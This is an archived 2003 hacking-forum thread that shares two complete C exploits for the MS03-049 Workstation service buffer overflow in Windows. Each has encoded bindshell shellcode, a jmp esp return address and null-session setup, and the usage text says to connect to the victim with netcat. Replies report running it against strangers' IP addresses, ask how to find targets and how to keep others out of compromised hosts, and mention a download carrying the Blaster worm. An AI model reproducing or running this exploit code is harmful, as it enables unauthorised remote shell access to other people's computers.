Ms03-049 Better Source Version

Full Version: Ms03-049 Better Source Version

GovernmentSecurity.org > The Archives > Public Downloads

creep01

Nov 13 2003, 08:06 PM

Thanks to Dinos for making the changes in the source..

Difference with wirepairs is
that there is an automation of rpc..
no need to run net use..and all the rest...

Also a fix in the header files...
Plus a few more things..

QUOTE

/* Update: WinXP sp1 is stripping \x89 characters, this is why my exploit won't work in sp1. I'm currently looking
* to fix this... if you pop in yer own sc without nulls or x89 bytes it will work, jmp esp call is the same between sp0 and sp1.
* ms03-049 by wirepair, pretty sweet find, although i can only get this to work on XPsp0. Win2k responds with like
op rng error stating it doesn't know what the hell i'm requesting. Eeye seemed to elude to the fact that 'only xp has these
undocumented api's' or something, anyways sc is from oc.192's awesome rpc exploit. This is beta and the code is friggen disgusting.
It was a hack job basically, but it works and i've tested it on 2 XP no sp machines. I'll add the 'change bindshell port' later.
It shouldn't crash the box either, at least in my cases exitthread does the trick.
This code proves how little i know about crazy windows string stuff if you see a bunch of crap that makes no sense like weird casting.
It's because I have no idea heh.
Only works against SP0 at the moment.... working on sp1 heh.
Usage:
C:\>net use \\ip.ip.ip.ip\IPC$ "" /u:""
C:\>0349 ip.ip.ip.ip
open new cmd:
C:\>nc ip.ip.ip.ip 4444
*** i can't understand the need of so many commands since you can put them here.
*** just adding making it more "human" - Dinos.

*/

#include <windows.h>
#include <winbase.h>
#include <lm.h>
// #include "LMJoin.h" //prolly don't need this but what the hey.
#include <winnls.h>
#include <stdio.h>
#include <string.h>

#pragma comment(lib, "mpr")

typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL,
IN LPCWSTR AlternateName,
IN LPCWSTR DomainAccount OPTIONAL,
IN LPCWSTR DomainAccountPassword OPTIONAL,
IN ULONG Reserved
);
int main(int argc, char **argv) {
char overwrite[2045] = "";
int ret;
char sc[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
char exp_buf[2045+4+16+501];
char ip[30];
LPWSTR ipl[60];
DWORD jmpesp = 0x7518A747;
LPWSTR unicode[(2045+4+16+501)*2];
int i = 0;
int len = 0;
HINSTANCE hinstLib;
NETRESOURCE netRes1;
MYPROC ProcAddr;
BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;

if (argc < 2) {
fprintf(stderr, "ms03-049 wkksvc.dll buffer overflow by wirepair.\n");
fprintf(stderr, "easy adds - Dinos. \n");
fprintf(stderr, "Usage: %s <ip>\n",argv[0]);
// fprintf(stderr, "C:\\>net use \\\\ip.ip.ip.ip\\IPC$ \"\" /u:\"\""\ //blah blah
fprintf(stderr, "\nC:\\>0349 ip.ip.ip.ip\n"\
"open new cmd:\n"\
"C:\\>nc ip.ip.ip.ip 4444\n"\
"If it doesn't hang the ip's invalid or it did not work\n");
exit(1);
}

printf("Attacking: %s\n",argv[1]);

// do the connect
// null session

sprintf(ip,"\\\\%s\\ipc$",argv[1]);

netRes1.lpLocalName = NULL;
netRes1.lpProvider = NULL;
netRes1.dwType = RESOURCETYPE_ANY;
netRes1.lpRemoteName = ip;

ret = WNetAddConnection2(&netRes1, "", "", 0);
if (ret != 0)
{
fprintf(stderr, "Null session failed \n");
return 1;
}
else
{
printf("Null session ok\n");
}
// null session

_snprintf(ip, 24, "\\\\%s", argv[1]); // i should've used vsprintf() >:)
hinstLib = LoadLibrary("netapi32.dll");

memset(overwrite, 0x41, 2000);
memset(overwrite+2000, 0x90, 44);
memcpy(exp_buf, overwrite, 2044);
memcpy(exp_buf+2044, &jmpesp, 4);
memset(exp_buf+2048, 0x90, 16);
memcpy(exp_buf+2064, sc, sizeof(sc));

MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);
wprintf(L"\n%s",ipl);
len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicode,sizeof(unicode));

if (hinstLib != NULL) {
ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName");
if (NULL != ProcAddr) {
fRunTimeLinkSuccess = TRUE;
printf("\nGetProcAddr: %x\n", *ProcAddr);
printf("Sending exploit, you should be able to nc to the host\n");
(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0);
} else {
printf("\nprocaddr null\n");
}

fFreeResult = FreeLibrary(hinstLib);
} else {
printf("hinst null\n");
}

return(0);
}

TmouR

Nov 13 2003, 08:13 PM

Great Work! Thnxs for the modification

jaxgough

Nov 13 2003, 08:30 PM

Cool

PrarieDog

Nov 13 2003, 10:05 PM

will test it out....thx

maxxis

Nov 13 2003, 10:25 PM

what is scan port ?

isaiah

Nov 13 2003, 11:05 PM

Maxxis, use your brains m8. About 2 threads down, there is a whole page full of information on the Original Exploit. Just take some time m8, and settle down

Its 139...

Thanks for the Hard Work Revising Guys!

Will Test It, and Let you Know Results.

Btbw

Nov 13 2003, 11:17 PM

thx for this ! but how we can scan for this exploit ?

isaiah

Nov 13 2003, 11:25 PM

Works Locally on my Computer.

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\>0349 127.0.0.1
Attacking: 127.0.0.1
Null session ok

\\127.0.0.1
GetProcAddr: 71c59530
Sending exploit, you should be able to nc to the host

telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32

Mr_X

Nov 14 2003, 12:57 AM

I made 2 functions you can add to this source:
extract_nc that create "nc.exe"
CALL: extract_nc();
exec_nc that exec "nc ip_specified_in_parameter 444" and then delete nc.exe
CALL: exec_nc(argv[1]) // (call it inside main)

the file in attachment contain what i've coded

isaiah

Nov 14 2003, 12:59 AM

Nice Job Mr_X!

Will test it out

tolf

Nov 14 2003, 08:40 AM

nice one... Tell "dino" nice...

yeyo

Nov 14 2003, 10:58 AM

thanks 4 the tools. lets try it

decline

Nov 14 2003, 01:00 PM

This is a nice tool man Looking forwared to the next version hehe

Thanks

GhostCow

Nov 14 2003, 04:14 PM

great post im gonna test it right away...
edit: man it doesn't seem to work on me or any of my friends... oh well!

enlightnr

Nov 14 2003, 05:42 PM

Im happy to reply to this thread

. GW Creep!

axl

Nov 14 2003, 07:49 PM

tested it !!!

works fine on remote XP sp0 !

haxor2k3

Nov 14 2003, 09:08 PM

Yep looks like its working

wicked

Nov 14 2003, 09:51 PM

Lookin Good

Bloodhound.Virii Detected by AV..

Wkd..

.../

subzero

Nov 14 2003, 10:12 PM

lol works 4 me only tried 6

nice job

wicked

Nov 14 2003, 11:12 PM

How About a Chinese Version...??

Very Oriental....

CODE

×÷Õß£ºsbaa,×÷ÕßÖ÷Ò³£ºsbaa.3322.org
bgtw:×÷ÕßÊÇ¸ö¸ßÊÖ£¬Ò²ÊÇ¸öºÃÈË £º£©
ms03049µÄÒç³ö´úÂë£¬ÐÞ¸Äºó²âÊÔ2k ³É¹¦
±àÒëºÃµÄ£ºhttp://sbaa.3322.org/public1/tool/ms03049.rar

Èç¹ûÔÚ2kÉÏÔËÐÐ ÐèÒª¶Ô·½²»ÄÜÊÇntfs·ÖÇø
Èç¹ûÔÚxpÔËÐÐÓ¦¸Ã¿ÉÒÔÃ»ÓÐÕâ¸öÏÞÖÆ£¬µ«ÎÒÃ»²âÊÔ
Ìø×ªÊÇjmp ebx, Ä¿Ç°µÄµØÖ·ÊÇ2kºÍxpÍ¨ÓÃµÄ£¬
±¾À´Ïë°ÑxpÏÂµÄdllÔÚ2kÏÂÓÃµÄ£¬µ«ntdll.dll
ÎÞ·¨Ìæ»»³É¹¦£¬×îÀíÏëµÄ×ö·¨ÊÇ×¥°üÊµÏÖÒç³ö£¬²»ÓÃ
windowsµÄ api ,µ«Ä¿Ç°Ã»Ê±¼ä¸ãÁË¡£

#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include <string.h>
//#include <winsock.h>

typedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);

#define SIZE 2048

#pragma comment(lib,"mpr.lib")
//#pragma comment(lib,"netapi32.lib")
#pragma comment(lib,"Ws2_32.lib")
//#pragma comment(lib,"user32.lib")

unsigned char shellcode[] =
/* bindshell no RPC crash, defineable spawn port */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

int main(int argc,char ** argv)
{
int ret=0;
HINSTANCE hInstance;
MYPROC procAddress;
char szBuffer[SIZE];
NETRESOURCE netResource;
int i=0;

unsigned short lportl=1234; /* drg */
char lport[5] = "\x00\xFF\xFF\x8b"; /* drg */

char host[30];
LPSTR hostipc[40];
LPWSTR hostl[60];
if(argc<2) {
printf("Windows Workstation ms03-049 wkksvc.dll buffer overflow \
\nbug discoveried by eEye,code by Hanabishi,shellcode by oc.192 \n \
Modified by sbaa(sbaa@163.net) 2003/11/14 ver 0.1\n \
Usage: %s IP \n \
nc Ip 1234\n",argv[0]);
printf("");
return 0;
}
sprintf(host,"\\\\%s",argv[1]);
sprintf((char *)hostipc,"%s\\ipc$",host);

netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;
// "\\\\192.168.6.7\\ipc$";

ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
fprintf(stderr, "[-] WNetAddConnection2 failed\n");
// return 1;
}

hInstance = LoadLibrary("netapi32");
if (hInstance == NULL)
{
fprintf(stderr, "[-] LoadLibrary failed\n");
return 1;
}

procAddress = (MYPROC)GetProcAddress(hInstance, "NetAddAlternateComputerName"); // up to you to check NetAddAlternateComputerName
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetAddAlternateComputerName (you are not xp(2003)) \n");
// return 1;
procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // up to you to check NetAddAlternateComputerName
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetValidateName!\n");
return 1;
}
}

memset(szBuffer, 0x90, sizeof(szBuffer));
/*
for( i=0;i<SIZE-4;i=i+4)
{

if((i+i/256)%256!=0) memset(szBuffer+i,i+i/256,1);
if((i+1)%256!=0) memset(szBuffer+i+1,i+1,1);
if((i+2)%256!=0) memset(szBuffer+i+2,i+2,1);
if((i+3)%256!=0) memset(szBuffer+i+3,i+3,1);
}
*/
lportl=htons(lportl);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&shellcode[471-48],&lport,4);
memcpy(szBuffer, shellcode, sizeof(shellcode) - 1);

memcpy(szBuffer+1851,"\x1b\x4a\xfa\x7f",4);
memcpy(szBuffer+2017,"\x1b\x4a\xfa\x7f",4);

szBuffer[SIZE-1]=0;

MultiByteToWideChar(CP_ACP, NULL, host, -1, (unsigned short*)hostl,60);

try{
ret = (procAddress)((LPCWSTR)hostl, (LPCWSTR)szBuffer, NULL, NULL, 0);

}

catch(...)
{

}

//ret=NetValidateName(hostl, szBuffer, NULL, NULL, 0);

printf("%d\n",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hInstance);
return 0;
}

½éÉÜÓë²¹¶¡½éÉÜÇë¿´
http://www.microsoft.com/technet/security/bulletin/MS03-049.asp

Note: Below File Has Win32.Blaster Virii...

|CraZy|

Nov 15 2003, 04:05 AM

nice work.. tested buh guess im unlucky

C:\>0349 *.*.2.89
0349 *.*.2.89
Attacking: *.*.2.89
Null session ok

\\*.*.2.89
procaddr null

C:\>nc *.*.2.89 4444

C:\>

timeout

Nov 15 2003, 10:25 AM

tested ~20 ips....none worked for me

Darklance

Nov 15 2003, 11:39 AM

Cool shit! Going to test it

Tool

Dec 8 2003, 12:18 AM

where can i get nc at or what is it?

DJVASTVASTY2K

Dec 8 2003, 11:27 AM

@Tool

You Can Get It Here

Big Thanks 2 Mr X 4 Provideing The Modified Bat Nc

http://www.governmentsecurity.org/forum/in...e=post&id=22795

Best Regards

Adam

Vast Gsm

T-BoNe

Dec 8 2003, 12:56 PM

mistell

jim_bob2003

Dec 8 2003, 01:29 PM

nc = netcat

hifil0wlife

Dec 8 2003, 04:03 PM

did not work for me. how old is this really? sp0? do we really need more exploits for it?........

Divx_dude

Dec 8 2003, 04:58 PM

Nice dude going to test it right away !

anybody got any results yet?

--Elite--

Dec 8 2003, 05:52 PM

Any1 have something TESTED & WORKED for 2kSP4 / XPSP1 ?

thnx all friends.

ivan288

Dec 8 2003, 05:58 PM

if you read it it says that it only works for Sp 0 and that he is workin on Sp1.

SLiM577

Dec 8 2003, 08:01 PM

Ermmm in the code it says

Usage:
C:\>net use \\ip.ip.ip.ip\IPC$ "" /u:""
C:\>0349 ip.ip.ip.ip
open new cmd:
C:\>nc ip.ip.ip.ip 4444

Im trying to test this on my box should i do

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\SLiM>net use \\127.0.0.1\IPC$ "" /u:""
The command completed successfully.

C:\Documents and Settings\SLiM>0349 127.0.0.1
Attacking: 127.0.0.1
Null session ok

\\127.0.0.1
GetProcAddr: 71c59530
Sending exploit, you should be able to nc to the host

Now at this Point do i open a new cmd and type

nc.exe 127.0.0.1 4444

or

telnet 127.0.0.1 4444

low_rider

Dec 8 2003, 08:48 PM

thnx mate will try it

studnikov

Dec 8 2003, 09:07 PM

Im gonna try this .. thanks again

Tool

Dec 8 2003, 10:01 PM

is there anyway to secure it so after you get on no one else can? thanks

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.